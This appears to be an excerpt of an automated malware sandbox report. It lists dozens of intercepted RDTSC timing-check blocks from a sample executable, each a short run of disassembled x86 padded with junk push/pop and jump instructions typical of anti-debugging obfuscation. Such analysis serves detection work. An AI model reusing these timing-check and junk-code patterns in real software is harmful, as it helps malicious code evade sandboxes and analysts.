Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE122C second address: AE1274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA0B8950Dh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F6FA0B8950Eh 0x00000015 pop eax 0x00000016 push ebx 0x00000017 add dword ptr [ebp+129C1AF5h], ebx 0x0000001d pop edx 0x0000001e jmp 00007F6FA0B8950Ah 0x00000023 call 00007F6FA0B89509h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1274 second address: AE1278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1278 second address: AE127E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE127E second address: AE1283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1283 second address: AE12CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B89511h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f js 00007F6FA0B89506h 0x00000015 pop edi 0x00000016 jmp 00007F6FA0B8950Fh 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6FA0B89512h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE12CE second address: AE12D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE12D2 second address: AE12E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE12E0 second address: AE12E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE12E4 second address: AE12F6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F6FA0B89506h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE12F6 second address: AE1320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F6FA127EBE9h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE145D second address: AE1462 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1AC6 second address: AE1B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F6FA127EBD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add edi, dword ptr [ebp+129C203Ch] 0x00000015 push 0000001Eh 0x00000017 mov dword ptr [ebp+129C1A77h], eax 0x0000001d nop 0x0000001e jns 00007F6FA127EBDAh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6FA127EBE4h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1B05 second address: AE1B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6FA0B89506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1EBB second address: AE1EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1EBF second address: AE1EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE1EC5 second address: ABB7ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6FA127EBD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jbe 00007F6FA127EBDBh 0x00000013 mov edx, 1E6E562Bh 0x00000018 lea eax, dword ptr [ebp+12B8295Ch] 0x0000001e sub dword ptr [ebp+129C1C3Fh], eax 0x00000024 push eax 0x00000025 jmp 00007F6FA127EBDBh 0x0000002a mov dword ptr [esp], eax 0x0000002d mov dh, 82h 0x0000002f call dword ptr [ebp+129C2ACAh] 0x00000035 push eax 0x00000036 push edx 0x00000037 jo 00007F6FA127EBEEh 0x0000003d jns 00007F6FA127EBD6h 0x00000043 jmp 00007F6FA127EBE2h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B20C3B second address: B20C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Fh 0x00000007 jmp 00007F6FA0B89514h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B20C62 second address: B20C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B20C6A second address: B20C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B20EC8 second address: B20EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6FA127EBE8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B21086 second address: B2108A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B2108A second address: B2108E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B21486 second address: B214B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B8950Ch 0x00000009 popad 0x0000000a jmp 00007F6FA0B89512h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B214B2 second address: B214B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B214B6 second address: B214C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA0B89506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B26E61 second address: B26E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBDCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B26E78 second address: B26E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B26E7C second address: B26E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B26E88 second address: B26E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F6FA0B89506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B26E94 second address: B26EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B26EB0 second address: B26EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B268B0 second address: B268BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6FA127EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B28CCE second address: B28CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B2CB5E second address: B2CB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B2CED7 second address: B2CEFA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA0B8951Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B31630 second address: B3164E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6FA127EBE8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3164E second address: B31653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B31653 second address: B31670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBE7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B317CC second address: B31834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89517h 0x00000008 jmp 00007F6FA0B89517h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F6FA0B89513h 0x00000014 popad 0x00000015 jmp 00007F6FA0B89510h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F6FA0B8950Ah 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B31834 second address: B31838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B31838 second address: B3185E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89516h 0x00000007 jo 00007F6FA0B89506h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B31E9D second address: B31EB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6FA127EBDAh 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B32092 second address: B320A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F6FA0B8950Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B321CF second address: B321DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B321DF second address: B321F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA0B89510h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B321F5 second address: B32219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6FA127EBDFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F6FA127EBD6h 0x00000012 jc 00007F6FA127EBD6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B32C7C second address: B32CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F6FA0B89508h 0x0000000b je 00007F6FA0B89512h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B32CA1 second address: B32CA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37AE6 second address: B37AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3710F second address: B37114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37253 second address: B37261 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37261 second address: B3726B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6FA127EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B373A8 second address: B373AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B373AC second address: B373B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B373B0 second address: B373B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B373B6 second address: B373E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA127EBE8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA127EBE2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B373E8 second address: B373F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA0B8950Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3753B second address: B37545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37545 second address: B37549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37549 second address: B37566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37566 second address: B37589 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA0B89517h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37589 second address: B3758D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3758D second address: B37593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B37593 second address: B3759F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F6FA127EBD6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3F11A second address: B3F142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89515h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA0B8950Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3F142 second address: B3F14D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D2E4 second address: B3D2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D2E8 second address: B3D2EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D2EC second address: B3D307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA0B89513h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D307 second address: B3D311 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA127EBD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D478 second address: B3D4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B8950Eh 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F6FA0B8950Fh 0x00000010 pop edx 0x00000011 jo 00007F6FA0B89512h 0x00000017 jno 00007F6FA0B89506h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D4AA second address: B3D4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D4B4 second address: B3D4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F6FA0B8950Dh 0x0000000b jnc 00007F6FA0B89506h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D4CE second address: B3D4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D4D4 second address: B3D4DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3D4DA second address: B3D4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3DFF0 second address: B3DFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007F6FA0B89506h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3DFFD second address: B3E003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3E003 second address: B3E00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6FA0B89506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3ED65 second address: B3ED6F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6FA127EBD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3ED6F second address: B3EDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6FA0B89517h 0x0000000c jmp 00007F6FA0B89519h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3EDA7 second address: B3EDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6FA127EBE5h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F6FA127EBDAh 0x00000019 popad 0x0000001a jc 00007F6FA127EBE1h 0x00000020 jmp 00007F6FA127EBDBh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B3EDE7 second address: B3EE05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89517h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4486C second address: B44870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B486FD second address: B48703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48703 second address: B4870B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4870B second address: B48714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48714 second address: B4871A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4871A second address: B48748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA0B8950Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA0B89516h 0x00000012 jnl 00007F6FA0B89506h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48748 second address: B4874C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B47AF9 second address: B47AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B47E3F second address: B47E44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48162 second address: B48175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
